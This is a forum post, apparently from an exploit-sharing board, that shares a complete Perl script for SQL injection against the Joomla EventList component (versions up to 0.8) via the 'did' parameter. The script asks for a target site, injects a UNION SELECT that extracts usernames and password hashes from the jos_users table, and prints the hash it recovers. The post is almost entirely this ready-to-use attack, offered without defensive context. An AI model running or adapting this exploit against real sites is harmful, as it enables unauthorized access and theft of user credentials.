Jump to content
Ras

Joomla Component EventList <= 0.8 (did) SQL Injection

By Ras, in Exploituri

Recommended Posts

Ras Newbie

Ras

Posted
Posted 
#!/usr/bin/perl -w
#(C)oded by illuz1oN
use LWP::UserAgent;
{
         print "[*]Site To Attack: ";
       chomp($site=<STDIN>);
      my $www = new LWP::UserAgent;
     my $exploit="$site/index.php?option=com_eventlist&func=details&did=9999999999999%20union%20select%200,0,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),4,5,6,7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20from%20jos_users/*";
     my $xpl = $www->get($exploit) or vuln();
        $xpl->content()=~/([0-9,a-f]{32})/ or vuln();
        print "\n[*]Hash Is: $1\n";
       }
sub vuln {
print qq[\n/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/
/~~~~~~~~~Site Was Not Vulnerable~~~~~~~/
/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/
];
exit;
}

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...